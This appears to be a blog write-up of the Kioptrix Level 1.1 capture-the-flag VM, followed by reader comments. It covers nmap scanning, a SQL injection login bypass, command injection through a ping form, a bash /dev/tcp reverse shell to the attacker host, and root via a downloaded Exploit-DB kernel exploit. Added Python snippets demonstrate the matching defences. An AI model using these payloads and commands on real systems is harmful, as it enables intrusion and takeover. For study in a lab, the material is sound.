Vulnhub – Kioptrix: Level 1.1 (#2)

Kioptrix: Level 1.1 (#2) is the second VM of the Kioptrix series, which can be found here. The Kioptrix VMs are intended for anyone who wants to start getting into pentesting. They are also similar to the VMs in the PWK course for those who want to get the OSCP certification.

Description from the author:
“These Kioptrix VM images are easy challenges. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games is to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways than one to successfully complete the challenges.”

Let's get started!

Kali Linux machine

192.168.182.147

Reconnaissance

Using the tool netdiscover, I found the victim VM to be 192.168.182.152

root@kali:~# netdiscover -i eth0 -r 192.168.182.0/24

Scanning

Using nmap, you can see the server is running OpenSSH 3.9p1 on 22/tcp, Apache httpd 2.0.52 on 80/tcp and 443/tcp, CUPS 1.1 on 631/tcp, and MySQL on 3306/tcp. It's probable that this web server has a back-end MySQL database behind it, which might be vulnerable to SQL injection.

root@kali:~# nmap -sS -T4 -A 192.168.182.152

Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2017-02-25 14:11 CST
Nmap scan report for 192.168.182.152
Host is up (0.00019s latency).
Not shown: 994 closed ports
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
| ssh-hostkey: 
|   1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
|   1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_  1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
|_sshv1: Server supports SSHv1
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp  open  rpcbind  2 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100024  1            621/udp  status
|_  100024  1            624/tcp  status
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
| http-cisco-anyconnect: 
|_  ERROR: Not a Cisco ASA or unsupported version
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-08T00:10:47
|_Not valid after:  2010-10-08T00:10:47
|_ssl-date: 2017-02-25T18:02:19+00:00; -2h09m45s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC4_64_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_CBC_128_CBC_WITH_MD5
|_    SSL2_RC4_128_EXPORT40_WITH_MD5
631/tcp  open  ipp      CUPS 1.1
| http-methods: Potentially risky methods: PUT
|_See http://nmap.org/nsedoc/scripts/http-methods.html
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
3306/tcp open  mysql    MySQL (unauthorized)
MAC Address: 00:0C:29:5C:FF:EC (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.19 ms 192.168.182.152

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.62 seconds
root@kali:~# 

Exploitation (SQL and Command Injection)

Browsing to the server, I found that it displays a login page. Next, I will try to perform an SQL injection.

I tested the login form by entering the string ' or '1'='1 in both the username and password fields, and it worked.

It probably worked because the SQL statement behind the form is along the lines of this:

 SELECT * FROM users WHERE username='$username' AND password='$password'

Supplying ' or '1'='1 as both the username and the password turns the SQL statement into:

 SELECT * FROM users WHERE username='' or '1'='1' AND password='' or '1'='1'

Because '1'='1' is always true, and the trailing or '1'='1' makes the whole WHERE clause true however AND and OR bind, this SELECT matches every row, so the application logs us in as the first user returned from the users table.
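To make the reasoning concrete, here is an added example (mine, not code from the write-up or from the Kioptrix VM) that reproduces the bypass against a constructed in-memory SQLite table standing in for the application's users table, and shows the parameterised query that stops it. The schema and the two sample users are assumptions; the real MySQL schema is not shown on the page.

```python
import sqlite3

# Constructed stand-in for the application's users table (assumption: the
# real schema behind the Kioptrix login form is not shown in the write-up).
SAMPLE_USERS = [("admin", "s3cret"), ("john", "letmein")]

# The string tried in the write-up, for both fields.
PAYLOAD = "' or '1'='1"


def build_db():
    """Create an in-memory SQLite database seeded with the constructed users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def build_vulnerable_sql(username, password):
    """The string-concatenation pattern the write-up infers: the user's input
    is pasted into the SQL text, so quotes in it become SQL syntax."""
    return ("SELECT username FROM users WHERE username='%s' AND password='%s'"
            % (username, password))


def login_vulnerable(conn, username, password):
    """Returns the first matching username, or None if no row matches."""
    row = conn.execute(build_vulnerable_sql(username, password)).fetchone()
    return row[0] if row else None


def login_safe(conn, username, password):
    """Parameterised query: the values travel separately from the SQL text,
    so a quote in the input is data, never syntax."""
    row = conn.execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = build_db()
    print(build_vulnerable_sql(PAYLOAD, PAYLOAD))
    print("vulnerable login   ->", login_vulnerable(db, PAYLOAD, PAYLOAD))  # admin
    print("parameterised login ->", login_safe(db, PAYLOAD, PAYLOAD))       # None
    print("legitimate login    ->", login_safe(db, "john", "letmein"))      # john
```

The vulnerable query returns "admin", the first row in the table, exactly as the write-up observes; the parameterised version returns nothing for the same input while still accepting real credentials. Prepared statements, not input filtering, are the fix.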

So now we have a ping command prompt, which might be vulnerable to command injection. Using the input ; id I found that the application was indeed vulnerable, so I also tried to see if I could get the usernames and passwords on the server. I was able to read the /etc/passwd file but didn't have access to /etc/shadow.

Knowing that the application is vulnerable to command injection, I took it a step further and tried to get a reverse shell.
I used netcat (nc) on the Kali machine to set up the listener that catches the reverse shell:

root@kali:~# nc -nvlp 443

Then I went back to the ping console on the website and ran the following to get the reverse shell:

; bash -i >& /dev/tcp/192.168.182.147/443 0>&1
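The ping form fails because the target string is handed to a shell, so ; and friends end the ping command and start another one. The following is an added example, not code from the write-up or the VM, that contrasts that pattern with a safe one: validate the field as a literal IP address, run ping as an argv list with no shell, and keep a simple detection heuristic for the same metacharacters in web logs. The ping invocation is an assumption about what the form does; the functions return the command rather than executing it so the block runs anywhere.

```python
import ipaddress
import re
import subprocess

# Shell metacharacters that let a second command ride along with the ping
# target (covers ";", pipes, redirections, backticks and $(...)).
METACHARS = re.compile(r"[;&|`$<>\n\r]")


def build_vulnerable_cmdline(target):
    """The pattern the write-up exploits: the form value is concatenated into
    a shell command line (returned for inspection, not executed)."""
    return "ping -c 3 %s" % target


def validate_target(target):
    """Accept only a literal IPv4/IPv6 address; ValueError for anything else.
    ipaddress.ip_address() refuses spaces, quotes and every metacharacter."""
    return str(ipaddress.ip_address(target.strip()))


def is_valid_target(target):
    """Boolean wrapper around validate_target() for callers that prefer it."""
    try:
        validate_target(target)
        return True
    except ValueError:
        return False


def build_safe_argv(target):
    """Validated value as a single argv element. Without a shell in the path
    (subprocess without shell=True), ';' or '|' are never interpreted even
    if validation were somehow bypassed."""
    return ["ping", "-c", "3", validate_target(target)]


def run_ping(target):
    """Assumption: a ping binary exists on the host. Returns the exit status."""
    return subprocess.run(build_safe_argv(target), capture_output=True).returncode


def looks_injected(target):
    """Detection heuristic for access logs or a WAF rule: flag any ping
    parameter containing shell metacharacters."""
    return bool(METACHARS.search(target))


if __name__ == "__main__":
    for value in ["192.168.182.147", "; id", "; bash -i >& /dev/tcp/192.168.182.147/443 0>&1"]:
        print(repr(value), "valid:", is_valid_target(value),
              "suspicious:", looks_injected(value))
```

Both inputs the write-up used fail validation and trip the heuristic, while a plain address passes. The argv form is the real control; the regex is only a detection aid, since an allow-list on the value is far easier to get right than a deny-list on characters.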


I successfully got a reverse shell as the apache user. Next I will try privilege escalation to get the desired root account.

bash-3.00$ uname -a
Linux kioptrix.level2 2.6.9-55.EL #1 Wed May 2 13:52:16 EDT 2007 i686 athlon i386 GNU/Linux
bash-3.00$ cat /etc/*-release
CentOS release 4.5 (Final)
bash-3.00$

It looks like the server is running CentOS release 4.5 which, after doing some research, I found to be vulnerable to the ‘ip_append_data()’ Ring0 privilege escalation exploit (Exploit-DB 9542).

So on the shell that we recently obtained, I used wget to download the exploit to the server.

bash-3.00$ wget https://www.exploit-db.com/download/9542 --no-check-certificate
--16:20:14--  https://www.exploit-db.com/download/9542
           => `9542'
Resolving www.exploit-db.com... 192.124.249.8
Connecting to www.exploit-db.com|192.124.249.8|:443... connected.
WARNING: Certificate verification error for www.exploit-db.com: unable to get local issuer certificate
WARNING: certificate common name `*.sucuri.net' doesn't match requested host name `www.exploit-db.com'.
HTTP request sent, awaiting response... 200 OK
Length: 2,645 (2.6K) [application/txt]

    0K ..                                                    100%   40.04 MB/s

16:20:14 (40.04 MB/s) - `9542' saved [2645/2645]

bash-3.00$ ls
9542 

Then I compiled the program and ran the exploit to get the root shell that we all desire.

bash-3.00$ ls
9542
bash-3.00$ mv 9542 9542.c
bash-3.00$ gcc 9542.c
bash-3.00$ ls -l
total 12
-rw-r--r--  1 apache apache 2645 Feb 25 16:20 9542.c
-rwxr-xr-x  1 apache apache 6932 Feb 25 16:21 a.out
bash-3.00$ ./a.out
sh: no job control in this shell
sh-3.00# id
uid=0(root) gid=0(root) groups=48(apache)
sh-3.00# whoami
root
sh-3.00# 
sh-3.00# hostname
kioptrix.level2
sh-3.00# 

Straightforward and to the point. Now on to level 3!

8 comments

  1. Valuable information. Lucky me I found your web site unintentionally,
    and I’m shocked why this accident did not come about earlier!
    I bookmarked it.

    1. It is honestly good to know that my material is really helpful to someone. I’m glad that I could help. Will do more write-ups in the weeks to come. Also doing some GitHub programs since I’ve been reading “Violent Python: A Cookbook for Hackers, Forensic Analysts, Penetration Testers, and Security Engineers,” so expect some more stuff in the future. If you have any recommendations on what other VMs I should try then let me know so I can try to do a write-up on it.

      1. Hi Guillermo, we are on the same page, I’m also learning Python, studying for Pentesting, we should study together:)

        1. I was doing a bit of Python earlier last month, but life happened and I haven’t been able to keep up with it. At the moment I’m relearning x86 assembly to get into reverse engineering. Will start brushing up on Python again before the semester starts. If anything, I’m part of a pentesting community on Discord. They talk about Python and much more there; if you’re interested I could give you the link? Could study with me and others if you like?

          1. Could you share the link to the Discord channel? I’m studying for OSCP and it’d probably be helpful. Thanks
